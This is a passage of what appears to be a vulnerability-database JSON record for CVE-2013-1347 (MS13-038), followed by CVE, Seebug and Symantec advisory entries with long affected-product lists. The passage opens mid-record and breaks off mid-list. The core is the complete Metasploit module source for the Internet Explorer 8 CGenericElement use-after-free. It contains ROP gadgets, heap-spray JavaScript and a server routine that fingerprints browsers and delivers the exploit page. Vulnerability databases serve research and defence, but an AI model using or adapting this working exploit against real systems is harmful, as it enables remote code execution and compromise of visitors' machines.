objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-04-11T20:20:30", "differentElements": ["modified", "published"], "edition": 40}], "viewCount": 72, "enchantments": {"vulnersScore": 5.8}, "objectVersion": "1.4", "metasploitReliability": "Good", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "_object_type": "robots.models.metasploit.MetasploitBulletin", "_object_types": ["robots.models.metasploit.MetasploitBulletin", "robots.models.base.Bulletin"]}
{"result": {"cve": [{"id": "CVE-2013-1347", "type": "cve", "title": "CVE-2013-1347", "description": "Microsoft Internet Explorer 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly allocated or (2) is deleted, as exploited in the wild in May 2013.", "published": "2013-05-05T07:07:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1347", "cvelist": ["CVE-2013-1347"], "lastseen": "2017-09-19T13:38:40"}], "seebug": [{"id": "SSV:60781", "type": "seebug", "title": "Microsoft IE 8\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e(CVE-2013-1347)", "description": "No description provided by source.", "published": "2013-05-07T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.seebug.org/vuldb/ssvid-60781", "cvelist": ["CVE-2013-1347"], "lastseen": "2017-11-19T17:44:16"}, {"id": "SSV:60790", "type": "seebug", "title": "Microsoft Internet Explorer \u91ca\u653e\u540e\u91cd\u7528\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e(CVE-2013-1347)(MS13-038)", "description": "No description provided by source.", "published": "2013-05-17T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.seebug.org/vuldb/ssvid-60790", "cvelist": ["CVE-2013-1347"], "lastseen": "2017-11-19T17:42:39"}], "symantec": [{"id": "SMNTC-59641", "type": "symantec", "title": "Microsoft Internet Explorer CVE-2013-1347 Use-After-Free Remote Code Execution Vulnerability", "description": "### Description\n\nMicrosoft Internet Explorer is prone to a remote code-execution vulnerability. Attackers can exploit this issue by enticing an unsuspecting user to view a specially crafted webpage. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial-of-service conditions. Microsoft Internet Explorer version 8 is affected.\n\n### Technologies Affected\n\n * Avaya CallPilot 4.0 \n * Avaya CallPilot 4.0.1 \n * Avaya CallPilot 5.0 \n * Avaya CallPilot 5.0.1 \n * Avaya Communication Server 1000 Telephony Manager 3.0 \n * Avaya Communication Server 1000 Telephony Manager 3.0.1 \n * Avaya Communication Server 1000 Telephony Manager 4.0 \n * Avaya Communication Server 1000 Telephony Manager 4.0.1 \n * Avaya Conferencing Standard Edition 6.0 \n * Avaya Conferencing Standard Edition 6.0 SP1 \n * Avaya Conferencing Standard Edition 6.0.1 \n * Avaya Meeting Exchange - Client Registration Server 5.0 \n * Avaya Meeting Exchange - Client Registration Server 5.0.1 \n * Avaya Meeting Exchange - Client Registration Server 5.2 \n * Avaya Meeting Exchange - Client Registration Server 5.2.1 \n * Avaya Meeting Exchange - Client Registration Server 6.0 \n * Avaya Meeting Exchange - Recording Server 5.0 \n * Avaya Meeting Exchange - Recording Server 5.0.1 \n * Avaya Meeting Exchange - Recording Server 5.2 \n * Avaya Meeting Exchange - Recording Server 5.2.1 \n * Avaya Meeting Exchange - Recording Server 6.0 \n * Avaya Meeting Exchange - Streaming Server 5.0 \n * Avaya Meeting Exchange - Streaming Server 5.0 \n * Avaya Meeting Exchange - Streaming Server 5.0.1 \n * Avaya Meeting Exchange - Streaming Server 5.2 \n * Avaya Meeting Exchange - Streaming Server 5.2.1 \n * Avaya Meeting Exchange - Streaming Server 6.0 \n * Avaya Meeting Exchange - Web Conferencing Server 5.0 \n * Avaya Meeting Exchange - Web Conferencing Server 5.0.1 \n * Avaya Meeting Exchange - Web Conferencing Server 5.2 \n * Avaya Meeting Exchange - Web Conferencing Server 5.2.1 \n * Avaya Meeting Exchange - Web Conferencing Server 6.0 \n * Avaya Meeting Exchange - Webportal 5.0 \n * Avaya Meeting Exchange - Webportal 5.0.1 \n * Avaya Meeting Exchange - Webportal 5.2 \n * Avaya Meeting Exchange - Webportal 5.2.1 \n * Avaya Meeting Exchange - Webportal 6.0 \n * Avaya Messaging Application Server 4 \n * Avaya Messaging Application Server 5 \n * Avaya Messaging Application Server 5.0 \n * Avaya Messaging Application Server 5.0.1 \n * Avaya Messaging Application Server 5.2 \n * Avaya Messaging Application Server 5.2.1 \n * Avaya Messaging Application Server MM 1.1 \n * Avaya Messaging Application Server MM 2.0 \n * Avaya Messaging Application Server MM 3.0 \n * Avaya Messaging Application Server MM 3.1 \n * Microsoft Internet Explorer 8 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nCurrently, we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: vuldb@securityfocus.com. The payloads delivered by the exploit kits are detected by Symantec as 'Trojan.Zbot' and 'Trojan.Horse'.\n", "published": "2013-05-03T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/59641", "cvelist": ["CVE-2013-1347"], "lastseen": "2018-03-14T22:39:51"}, {"id": "SMNTC-58238", "type": "symantec", "title": "Oracle Java SE CVE-2013-1493 Remote Code Execution Vulnerability", "description": "### Description\n\nOracle Java SE is prone to a remote code execution vulnerability. An attacker can exploit this issue to execute arbitrary code in the context of the application. This vulnerability affects the following supported versions: JDK and JRE 7 Update 15 and prior JDK and JRE 6 Update 41 and prior JDK and JRE 5.0 Update 40 and prior\n\n### Technologies Affected\n\n * Apple Mac OS X 10.6.8 \n * Apple Mac OS X 10.7 \n * Apple Mac OS X 10.7.1 \n * Apple Mac OS X 10.7.2 \n * Apple Mac OS X 10.7.3 \n * Apple Mac OS X 10.7.4 \n * Apple Mac OS X 10.7.5 \n * Apple Mac OS X 10.8 \n * Apple Mac OS X 10.8.1 \n * Apple Mac OS X 10.8.2 \n * Apple Mac OS X Server 10.0.1 \n * Apple Mac OS X Server 10.6.8 \n * Apple Mac OS X Server 10.7 \n * Apple Mac OS X Server 10.7.1 \n * Apple Mac OS X Server 10.7.2 \n * Apple Mac OS X Server 10.7.3 \n * Apple Mac OS X Server 10.7.4 \n * Avaya Aura Application Enablement Services 5.2 \n * Avaya Aura Application Enablement Services 5.2.1 \n * Avaya Aura Application Enablement Services 5.2.2 \n * Avaya Aura Application Enablement Services 5.2.3 \n * Avaya Aura Application Enablement Services 5.2.4 \n * Avaya Aura Application Enablement Services 6.1 \n * Avaya Aura Application Enablement Services 6.1.1 \n * Avaya Aura Application Enablement Services 6.1.2 \n * Avaya Aura Application Enablement Services 6.2 \n * Avaya Aura Application Server 5300 SIP Core 2.0 \n * Avaya Aura Application Server 5300 SIP Core 2.1 \n * Avaya Aura Application Server 5300 SIP Core 3.0 \n * Avaya Aura Communication Manager 5.2 \n * Avaya Aura Communication Manager 5.2.1 \n * Avaya Aura Communication Manager 5.2.1 SP2 \n * Avaya Aura Communication Manager 5.2.1 SP5 \n * Avaya Aura Communication Manager 6.0 \n * Avaya Aura Communication Manager 6.0.1 \n * Avaya Aura Communication Manager 6.2 \n * Avaya Aura Communication Manager Utility Services 6.0 \n * Avaya Aura Communication Manager Utility Services 6.1 \n * Avaya Aura Communication Manager Utility Services 6.1 SP 6.1.0.9.8 \n * Avaya Aura Communication Manager Utility Services 6.1.0.9.8 \n * Avaya Aura Communication Manager Utility Services 6.2 \n * Avaya Aura Communication Manager Utility Services 6.2.4.0.15 \n * Avaya Aura Communication Manager Utility Services 6.2.5.0.15 \n * Avaya Aura Conferencing 7.0 \n * Avaya Aura Experience Portal 6.0 \n * Avaya Aura Experience Portal 6.0 SP1 \n * Avaya Aura Experience Portal 6.0 SP2 \n * Avaya Aura Experience Portal 6.0.1 \n * Avaya Aura Experience Portal 6.0.2 \n * Avaya Aura Messaging 6.0 \n * Avaya Aura Messaging 6.0.1 \n * Avaya Aura Messaging 6.1 \n * Avaya Aura Messaging 6.1.1 \n * Avaya Aura Messaging 6.2 \n * Avaya Aura Presence Services 6.0 \n * Avaya Aura Presence Services 6.1 \n * Avaya Aura Presence Services 6.1.1 \n * Avaya Aura Presence Services 6.1.2 \n * Avaya Aura SIP Enablement Services 5.0 \n * Avaya Aura SIP Enablement Services 5.1 \n * Avaya Aura SIP Enablement Services 5.2 \n * Avaya Aura SIP Enablement Services 5.2.1 \n * Avaya Aura Session Manager 1.1 \n * Avaya Aura Session Manager 1.1.1 \n * Avaya Aura Session Manager 5.2 \n * Avaya Aura Session Manager 5.2 SP1 \n * Avaya Aura Session Manager 5.2 SP2 \n * Avaya Aura Session Manager 5.2.1 \n * Avaya Aura Session Manager 6.0 \n * Avaya Aura Session Manager 6.0 SP1 \n * Avaya Aura Session Manager 6.0.1 \n * Avaya Aura Session Manager 6.1 \n * Avaya Aura Session Manager 6.1 SP1 \n * Avaya Aura Session Manager 6.1 SP2 \n * Avaya Aura Session Manager 6.1.1 \n * Avaya Aura Session Manager 6.1.2 \n * Avaya Aura Session Manager 6.1.3 \n * Avaya Aura Session Manager 6.1.5 \n * Avaya Aura Session Manager 6.2 \n * Avaya Aura Session Manager 6.2 SP1 \n * Avaya Aura Session Manager 6.2.1 \n * Avaya Aura Session Manager 6.2.2 \n * Avaya Aura Session Manager 6.3 \n * Avaya Aura System Manager 5.2 \n * Avaya Aura System Manager 6.0 \n * Avaya Aura System Manager 6.0 SP1 \n * Avaya Aura System Manager 6.1 \n * Avaya Aura System Manager 6.1 SP1 \n * Avaya Aura System Manager 6.1 SP2 \n * Avaya Aura System Manager 6.1.1 \n * Avaya Aura System Manager 6.1.2 \n * Avaya Aura System Manager 6.1.3 \n * Avaya Aura System Manager 6.1.5 \n * Avaya Aura System Manager 6.2 \n * Avaya Aura System Manager 6.2 SP3 \n * Avaya Aura System Manager 6.2.3 \n * Avaya Aura System Manager 6.3 \n * Avaya Aura System Platform 1.0 \n * Avaya Aura System Platform 6.0 \n * Avaya Aura System Platform 6.0 SP2 \n * Avaya Aura System Platform 6.0 SP3 \n * Avaya Aura System Platform 6.0.1 \n * Avaya Aura System Platform 6.0.2 \n * Avaya Aura System Platform 6.0.3.0.3 \n * Avaya Aura System Platform 6.0.3.8.3 \n * Avaya Aura System Platform 6.0.3.9.3 \n * Avaya Aura System Platform 6.2 \n * Avaya Aura System Platform 6.2 SP1 \n * Avaya Aura System Platform 6.2.1 \n * Avaya Aura System Platform 6.2.1.0.9 \n * Avaya Call Management System R 15 \n * Avaya Call Management System R 16 \n * Avaya Conferencing Standard Edition 6.0 \n * Avaya Conferencing Standard Edition 6.0 SP1 \n * Avaya Conferencing Standard Edition 6.0.1 \n * Avaya IP Office Application Server 8.0 \n * Avaya IP Office Application Server 8.1 \n * Avaya IP Office Server Edition 8.0 \n * Avaya IP Office Server Edition 8.1 \n * Avaya IQ 4.0 \n * Avaya IQ 4.1.0 \n * Avaya IQ 4.2 \n * Avaya IQ 5 \n * Avaya IQ 5.1 \n * Avaya IQ 5.1.1 \n * Avaya IQ 5.2 \n * Avaya IR 4.0 \n * Avaya Meeting Exchange - Client Registration Server 6.0 \n * Avaya Meeting Exchange - Recording Server 6.0 \n * Avaya Meeting Exchange - Streaming Server 6.0 \n * Avaya Meeting Exchange - Web Conferencing Server 6.0 \n * Avaya Meeting Exchange - Webportal 6.0 \n * Avaya Message Networking 5.2 \n * Avaya Message Networking 5.2 SP1 \n * Avaya Message Networking 5.2 SP3 \n * Avaya Message Networking 5.2.1 \n * Avaya Message Networking 5.2.2 \n * Avaya Message Networking 5.2.3 \n * Avaya Message Networking 5.2.4 \n * Avaya Message Networking 5.2.5 \n * Avaya Messaging Application Server 5.2.1 \n * Avaya Messaging Storage Server 5.2.12 \n * Avaya Messaging Storage Server 5.2.13 \n * Avaya Messaging Storage Server 5.2.14 \n * Avaya Messaging Storage Server 5.2.2 \n * Avaya Messaging Storage Server 5.2.8 \n * Avaya Messaging Storage Server 5.2.9 \n * Avaya Proactive Contact 5.0 \n * Avaya Proactive Contact 5.1 \n * Avaya Voice Portal 5.0 \n * Avaya Voice Portal 5.0 SP1 \n * Avaya Voice Portal 5.0 SP2 \n * Avaya Voice Portal 5.1 \n * Avaya Voice Portal 5.1 SP1 \n * Avaya Voice Portal 5.1 SP3 \n * Avaya Voice Portal 5.1 Sp2 \n * Avaya Voice Portal 5.1.1 \n * Avaya Voice Portal 5.1.2 \n * Avaya Voice Portal 5.1.3 \n * CentOS CentOS 5 \n * CentOS CentOS 6 \n * Fedoraproject Fedora 17 \n * Fedoraproject Fedora 18 \n * Gentoo Linux \n * HP HP-UX B.11.11 \n * HP HP-UX B.11.31 \n * HP NonStop Server H06.15.00 \n * HP NonStop Server H06.15.01 \n * HP NonStop Server H06.15.02 \n * HP NonStop Server H06.16.00 \n * HP NonStop Server H06.16.01 \n * HP NonStop Server H06.16.02 \n * HP NonStop Server H06.17.00 \n * HP NonStop Server H06.17.01 \n * HP NonStop Server H06.17.02 \n * HP NonStop Server H06.17.03 \n * HP NonStop Server H06.18.00 \n * HP NonStop Server H06.18.01 \n * HP NonStop Server H06.18.02 \n * HP NonStop Server H06.19.00 \n * HP NonStop Server H06.19.01 \n * HP NonStop Server H06.19.02 \n * HP NonStop Server H06.19.03 \n * HP NonStop Server H06.20.00 \n * HP NonStop Server H06.20.01 \n * HP NonStop Server H06.20.02 \n * HP NonStop Server H06.20.03 \n * HP NonStop Server H06.21.00 \n * HP NonStop Server H06.21.01 \n * HP NonStop Server H06.21.02 \n * HP NonStop Server H06.22.00 \n * HP NonStop Server H06.22.01 \n * HP NonStop Server H06.23 \n * HP NonStop Server H06.24 \n * HP NonStop Server H06.24.01 \n * HP NonStop Server H06.25 \n * HP NonStop Server H06.25.01 \n * HP NonStop Server H06.26 \n * HP NonStop Server H06.26.01 \n * HP NonStop Server H06.27 \n * HP NonStop Server J06.04.00 \n * HP NonStop Server J06.04.01 \n * HP NonStop Server J06.04.02 \n * HP NonStop Server J06.05.00 \n * HP NonStop Server J06.05.01 \n * HP NonStop Server J06.05.02 \n * HP NonStop Server J06.06.00 \n * HP NonStop Server J06.06.01 \n * HP NonStop Server J06.06.02 \n * HP NonStop Server J06.06.03 \n * HP NonStop Server J06.07.00 \n * HP NonStop Server J06.07.01 \n * HP NonStop Server J06.07.02 \n * HP NonStop Server J06.08.00 \n * HP NonStop Server J06.08.01 \n * HP NonStop Server J06.08.02 \n * HP NonStop Server J06.08.03 \n * HP NonStop Server J06.08.04 \n * HP NonStop Server J06.09.00 \n * HP NonStop Server J06.09.01 \n * HP NonStop Server J06.09.02 \n * HP NonStop Server J06.09.03 \n * HP NonStop Server J06.09.04 \n * HP NonStop Server J06.10.00 \n * HP NonStop Server J06.10.01 \n * HP NonStop Server J06.10.02 \n * HP NonStop Server J06.11.00 \n * HP NonStop Server J06.11.01 \n * HP NonStop Server J06.12.00 \n * HP NonStop Server J06.13 \n * HP NonStop Server J06.13.01 \n * HP NonStop Server J06.14 \n * HP NonStop Server J06.14.02 \n * HP NonStop Server J06.15 \n * HP NonStop Server J06.15.01 \n * HP NonStop Server J06.16 \n * HP NonStop Server J6.0.14.01 \n * HP Service Manager 7.11 \n * HP Service Manager 9.31 \n * HP Service Manager 9.32 \n * HP Service Manager 9.33 \n * Hitachi Cosminexus Application Server 05-00 (AIX) \n * Hitachi Cosminexus Application Server 05-00 (HP-UX) \n * Hitachi Cosminexus Application Server 05-00 (Windows) \n * Hitachi Cosminexus Application Server 05-00-/A (AIX) \n * Hitachi Cosminexus Application Server 05-00-/A (HP-UX) \n * Hitachi Cosminexus Application Server 05-00-/B (AIX) \n * Hitachi Cosminexus Application Server 05-00-/B (HP-UX) \n * Hitachi Cosminexus Application Server 05-00-/C (AIX) \n * Hitachi Cosminexus Application Server 05-00-/C (HP-UX) \n * Hitachi Cosminexus Application Server 05-00-/D (AIX) \n * Hitachi Cosminexus Application Server 05-00-/E (AIX) \n * Hitachi Cosminexus Application Server 05-00-/F (AIX) \n * Hitachi Cosminexus Application Server 05-00-/G (AIX) \n * Hitachi Cosminexus Application Server 05-00-/H (AIX) \n * Hitachi Cosminexus Application Server 05-00-/I (AIX) \n * Hitachi Cosminexus Application Server 05-00-/I (Windows) \n * Hitachi Cosminexus Application Server 05-00-/J (AIX) \n * Hitachi Cosminexus Application Server 05-00-/K (AIX) \n * Hitachi Cosminexus Application Server 05-00-/L (AIX) \n * Hitachi Cosminexus Application Server 05-00-/M (AIX) \n * Hitachi Cosminexus Application Server 05-00-/N (AIX) \n * Hitachi Cosminexus Application Server 05-00-/O (AIX) \n * Hitachi Cosminexus Application Server 05-00-/P (AIX) \n * Hitachi Cosminexus Application Server 05-00-/Q (AIX) \n * Hitachi Cosminexus Application Server 05-00-/R (AIX) \n * Hitachi Cosminexus Application Server 05-00-/S (AIX) \n * Hitachi Cosminexus Application Server 05-01 (Windows) \n * Hitachi Cosminexus Application Server 05-01-/A (Windows) \n * Hitachi Cosminexus Application Server 05-01-/B (Windows) \n * Hitachi Cosminexus Application Server 05-01-/C (Windows) \n * Hitachi Cosminexus Application Server 05-01-/D (Windows) \n * Hitachi Cosminexus Application Server 05-01-/E (Windows) \n * Hitachi Cosminexus Application Server 05-01-/F (Windows) \n * Hitachi Cosminexus Application Server 05-01-/G (Windows) \n * Hitachi Cosminexus Application Server 05-01-/H (Windows) \n * Hitachi Cosminexus Application Server 05-01-/I (Windows) \n * Hitachi Cosminexus Application Server 05-01-/J (Windows) \n * Hitachi Cosminexus Application Server 05-01-/K (Windows) \n * Hitachi Cosminexus Application Server 05-01-/L (Windows) \n * Hitachi Cosminexus Application Server 05-02 (HP-UX) \n * Hitachi Cosminexus Application Server 05-02-/A (HP-UX) \n * Hitachi Cosminexus Application Server 05-02-/B (HP-UX) \n * Hitachi Cosminexus Application Server 05-02-/C (HP-UX) \n * Hitachi Cosminexus Application Server 05-02-/D (HP-UX) \n * Hitachi Cosminexus Application Server 05-02-/E (HP-UX) \n * Hitachi Cosminexus Application Server 05-05 (AIX) \n * Hitachi Cosminexus Application Server 05-05 (HP-UX) \n * Hitachi Cosminexus Application Server 05-05 (Linux) \n * Hitachi Cosminexus Application Server 05-05 (Windows) \n * Hitachi Cosminexus Application Server 05-05-/A (AIX) \n * Hitachi Cosminexus Application Server 05-05-/A (HP-UX) \n * Hitachi Cosminexus Application Server 05-05-/A (Linux) \n * Hitachi Cosminexus Application Server 05-05-/A (Windows) \n * Hitachi Cosminexus Application Server 05-05-/B (AIX) \n * Hitachi Cosminexus Application Server 05-05-/B (HP-UX) \n * Hitachi Cosminexus Application Server 05-05-/B (Linux) \n * Hitachi Cosminexus Application Server 05-05-/B (Windows) \n * Hitachi Cosminexus Application Server 05-05-/C (AIX) \n * Hitachi Cosminexus Application Server 05-05-/C (HP-UX) \n * Hitachi Cosminexus Application Server 05-05-/C (Linux) \n * Hitachi Cosminexus Application Server 05-05-/C (Windows) \n * Hitachi Cosminexus Application Server 05-05-/D (AIX) \n * Hitachi Cosminexus Application Server 05-05-/D (HP-UX) \n * Hitachi Cosminexus Application Server 05-05-/D (Linux) \n * Hitachi Cosminexus Application Server 05-05-/D (Windows) \n * Hitachi Cosminexus Application Server 05-05-/E (AIX) \n * Hitachi Cosminexus Application Server 05-05-/E (HP-UX) \n * Hitachi Cosminexus Application Server 05-05-/E (Linux) \n * Hitachi Cosminexus Application Server 05-05-/E (Windows) \n * Hitachi Cosminexus Application Server 05-05-/F (AIX) \n * Hitachi Cosminexus Application Server 05-05-/F (HP-UX) \n * Hitachi Cosminexus Application Server 05-05-/F (Linux) \n * Hitachi Cosminexus Application Server 05-05-/F (Windows) \n * Hitachi Cosminexus Application Server 05-05-/G (AIX) \n * Hitachi Cosminexus Application Server 05-05-/G (HP-UX) \n * Hitachi Cosminexus Application Server 05-05-/G (Linux) \n * Hitachi Cosminexus Application Server 05-05-/G (Windows) \n * Hitachi Cosminexus Application Server 05-05-/H (AIX) \n * Hitachi Cosminexus Application Server 05-05-/H (HP-UX) \n * Hitachi Cosminexus Application Server 05-05-/H (Windows) \n * Hitachi Cosminexus Application Server 05-05-/H(Linux) \n * Hitachi Cosminexus Application Server 05-05-/I (AIX) \n * Hitachi Cosminexus Application Server 05-05-/I (HP-UX) \n * Hitachi Cosminexus Application Server 05-05-/I (Linux) \n * Hitachi Cosminexus Application Server 05-05-/I (Windows) \n * Hitachi Cosminexus Application Server 05-05-/J (AIX) \n * Hitachi Cosminexus Application Server 05-05-/J (Windows) \n * Hitachi Cosminexus Application Server 05-05-/K (AIX) \n * Hitachi Cosminexus Application Server 05-05-/K (Windows) \n * Hitachi Cosminexus Application Server 05-05-/L (AIX) \n * Hitachi Cosminexus Application Server 05-05-/L (Windows) \n * Hitachi Cosminexus Application Server 05-05-/M (AIX) \n * Hitachi Cosminexus Application Server 05-05-/M (Windows) \n * Hitachi Cosminexus Application Server 05-05-/M \n * Hitachi Cosminexus Application Server 05-05-/N (Windows) \n * Hitachi 